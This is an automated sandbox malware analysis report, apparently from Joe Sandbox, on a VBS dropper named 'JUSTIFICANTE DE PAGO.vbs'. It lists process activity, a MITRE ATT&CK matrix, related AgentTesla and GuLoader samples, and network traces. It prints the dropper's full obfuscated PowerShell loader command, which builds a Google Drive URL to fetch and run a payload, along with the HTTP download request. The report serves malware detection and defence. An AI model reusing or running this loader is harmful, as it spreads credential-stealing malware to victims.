Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4738
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5170
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000002.00000002.1394575729.000001D95CB67000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. 
A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (tactic: techniques; numbers in parentheses are the counts shown in the matrix)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Scripting (221), Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Command and Scripting Interpreter (11), Exploitation for Client Execution (1), PowerShell (2), Cron, Launchd, Scheduled Task
Persistence: Scripting (221), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (21), Process Injection (11), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (1), Process Discovery (1), Virtualization/Sandbox Evasion (21), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (12)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (13), Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Antivirus detection (sample)
Source | Detection | Scanner | Label
JUSTIFICANTE DE PAGO.vbs | 5% | ReversingLabs | Win32.Dropper.Generic
JUSTIFICANTE DE PAGO.vbs | 10% | Virustotal | -

No Antivirus matches

Antivirus detection (URLs)
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://drive.googP | 0% | Avira URL Cloud | safe
https://drive.usercontent.google.comX1 | 0% | Avira URL Cloud | safe
https://drive.usercontent.googh | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.101.138 | true | false | - | high
drive.usercontent.google.com | 142.251.2.132 | true | false | - | high
URLs
Name | Source | Malicious | Antivirus Detection | Reputation
https://drive.usercontent.google.comX1 | powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.1347362979.000001D94671F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000002.00000002.1347362979.000001D94587B000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.googP | powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com | powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://drive.usercontent.googh | powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com | powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://drive.google.com | powershell.exe, 00000002.00000002.1347362979.000001D9466E6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://apis.google.com | powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp | false | - | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.101.138 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.251.2.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
General Information
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430767
Start date and time: 2024-04-24 07:00:34 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: JUSTIFICANTE DE PAGO.vbs
Detection: MAL
Classification: mal100.expl.evad.winVBS@6/4@2/2
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7420 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
                              Time | Type | Description
                              07:01:22 | API Interceptor | 46x Sleep call for process: powershell.exe modified
                              No context
                              No context
                              No context
                              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                              3b5074b1b5d032e5620f69f9f700ff0e | JUSTIFICANTE DE PAGO.vbs | Get hash | malicious | Unknown | Browse | 142.251.2.132, 142.250.101.138
                               | orden de compra.vbs | Get hash | malicious | AgentTesla | Browse | 142.251.2.132, 142.250.101.138
                               | FT. 40FE CNY .xlsx.lnk | Get hash | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | Browse | 142.251.2.132, 142.250.101.138
                               | DHL Shipping doc.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 142.251.2.132, 142.250.101.138
                               | G4-TODOS.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse | 142.251.2.132, 142.250.101.138
                               | Reconfirm Details.vbs | Get hash | malicious | AgentTesla | Browse | 142.251.2.132, 142.250.101.138
                               | purchase order pdf.exe | Get hash | malicious | AgentTesla | Browse | 142.251.2.132, 142.250.101.138
                               | PO 23JC0704-Rollease-B.exe | Get hash | malicious | AgentTesla | Browse | 142.251.2.132, 142.250.101.138
                               | 3Shape Unite Installer.exe | Get hash | malicious | Unknown | Browse | 142.251.2.132, 142.250.101.138
                               | ScreenConnect.Client.exe | Get hash | malicious | ScreenConnect Tool | Browse | 142.251.2.132, 142.250.101.138
                              No context
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulJnp/p:NllU
                              MD5:BC6DB77EB243BF62DC31267706650173
                              SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                              SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                              SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:@...e.................................X..............@..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                              Category:dropped
                              Size (bytes):1692
                              Entropy (8bit):5.113342353195585
                              Encrypted:false
                              SSDEEP:24:hazspwblvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pumRq+fjsueFYaWJ
                              MD5:F72C0F8A7FD3C03978E09A97BB318A75
                              SHA1:0FBFD436414CF6A55C331D18C30F09E683D34C58
                              SHA-256:B2EF63BC335205DF5D77E2D3E58808B11A95F4F0AFC80CE28744EBC1A992E4CF
                              SHA-512:19DCFCC8BFA32B058AFB322DF672F1072BD485B12007D9F130AF410746F9DE0FC6890139E5A15F7E703A53BC81D84912FD6CF565A52469F0D1A793E94ABBD862
                              Malicious:false
                              Reputation:low
                              Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="MEFqeyJUdqRLIbBN-IqPsw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
                              File type:ASCII text, with very long lines (363), with CRLF line terminators
                              Entropy (8bit):5.360521611728459
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:JUSTIFICANTE DE PAGO.vbs
                              File size:8'223 bytes
                              MD5:fdf5dceb2d284e54cf0a421a463b621d
                              SHA1:e5f7ec649576934ac61090f1380d23b9d2ac5d09
                              SHA256:0923a2d6d1c333ebd0f4320b2fe23015ecf70f3ebeb5a89d883b8259869d4743
                              SHA512:a7af097d89597788c1f5f368dc5df4430efdb1315034b4790610d681284af2cb73d5d7627fcf8c6048558c2149ce553b2f9ac1d4ddc4aa84207644240ca51281
                              SSDEEP:192:3xbypOqPkZz+5xE1Naq+wtwFBsaqOaJA8Z/cDWzNZWiEtM0J:hblIiblwHsa3a/FcriEtv
                              TLSH:02022B1F2B2724794BA30A74D8C739010634147EF22E1A7FF65487AAAF5B7D8206A75C
                              File Content Preview:.. ..Function Nolo ......Sa4 = Sa4 & "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness
                              Icon Hash:68d69b8f86ab9a86
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Apr 24, 2024 07:01:24.415484905 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:24.415520906 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:24.415591955 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:24.424638987 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:24.424654961 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:24.787094116 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:24.787293911 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:24.788265944 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:24.788336992 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:24.791718006 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:24.791733027 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:24.791987896 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:24.807866096 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:24.848120928 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:25.359215021 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:25.359302998 CEST | 443 | 49705 | 142.250.101.138 | 192.168.2.10
                              Apr 24, 2024 07:01:25.359441042 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:25.361335039 CEST | 49705 | 443 | 192.168.2.10 | 142.250.101.138
                              Apr 24, 2024 07:01:25.553509951 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Apr 24, 2024 07:01:25.553550005 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:25.553611040 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Apr 24, 2024 07:01:25.580961943 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Apr 24, 2024 07:01:25.580990076 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:25.942476988 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:25.942589045 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Apr 24, 2024 07:01:25.945317030 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Apr 24, 2024 07:01:25.945327044 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:25.945729017 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:25.946618080 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Apr 24, 2024 07:01:25.988117933 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:27.427581072 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:27.427642107 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Apr 24, 2024 07:01:27.427651882 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:27.427664042 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:27.427725077 CEST | 443 | 49706 | 142.251.2.132 | 192.168.2.10
                              Apr 24, 2024 07:01:27.427762032 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Apr 24, 2024 07:01:27.429258108 CEST | 49706 | 443 | 192.168.2.10 | 142.251.2.132
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Apr 24, 2024 07:01:24.255170107 CEST | 62262 | 53 | 192.168.2.10 | 1.1.1.1
                              Apr 24, 2024 07:01:24.408652067 CEST | 53 | 62262 | 1.1.1.1 | 192.168.2.10
                              Apr 24, 2024 07:01:25.362626076 CEST | 53500 | 53 | 192.168.2.10 | 1.1.1.1
                              Apr 24, 2024 07:01:25.531210899 CEST | 53 | 53500 | 1.1.1.1 | 192.168.2.10
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Apr 24, 2024 07:01:24.255170107 CEST | 192.168.2.10 | 1.1.1.1 | 0x2366 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                              Apr 24, 2024 07:01:25.362626076 CEST | 192.168.2.10 | 1.1.1.1 | 0x9063 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Apr 24, 2024 07:01:24.408652067 CEST | 1.1.1.1 | 192.168.2.10 | 0x2366 | No error (0) | drive.google.com | | 142.250.101.138 | A (IP address) | IN (0x0001) | false
                              Apr 24, 2024 07:01:24.408652067 CEST | 1.1.1.1 | 192.168.2.10 | 0x2366 | No error (0) | drive.google.com | | 142.250.101.101 | A (IP address) | IN (0x0001) | false
                              Apr 24, 2024 07:01:24.408652067 CEST | 1.1.1.1 | 192.168.2.10 | 0x2366 | No error (0) | drive.google.com | | 142.250.101.100 | A (IP address) | IN (0x0001) | false
                              Apr 24, 2024 07:01:24.408652067 CEST | 1.1.1.1 | 192.168.2.10 | 0x2366 | No error (0) | drive.google.com | | 142.250.101.102 | A (IP address) | IN (0x0001) | false
                              Apr 24, 2024 07:01:24.408652067 CEST | 1.1.1.1 | 192.168.2.10 | 0x2366 | No error (0) | drive.google.com | | 142.250.101.139 | A (IP address) | IN (0x0001) | false
                              Apr 24, 2024 07:01:24.408652067 CEST | 1.1.1.1 | 192.168.2.10 | 0x2366 | No error (0) | drive.google.com | | 142.250.101.113 | A (IP address) | IN (0x0001) | false
                              Apr 24, 2024 07:01:25.531210899 CEST | 1.1.1.1 | 192.168.2.10 | 0x9063 | No error (0) | drive.usercontent.google.com | | 142.251.2.132 | A (IP address) | IN (0x0001) | false
                              • drive.google.com
                              • drive.usercontent.google.com
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.10 | 49705 | 142.250.101.138 | 443 | 7420 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-04-24 05:01:24 UTC | 215 | OUT | GET /uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.google.com
                              Connection: Keep-Alive
                              2024-04-24 05:01:25 UTC | 1582 | IN | HTTP/1.1 303 See Other
                              Content-Type: application/binary
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 24 Apr 2024 05:01:25 GMT
                              Location: https://drive.usercontent.google.com/download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download
                              Strict-Transport-Security: max-age=31536000
                              Content-Security-Policy: script-src 'nonce-NwSdplKim9TLUF3pGi_eJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Opener-Policy: same-origin
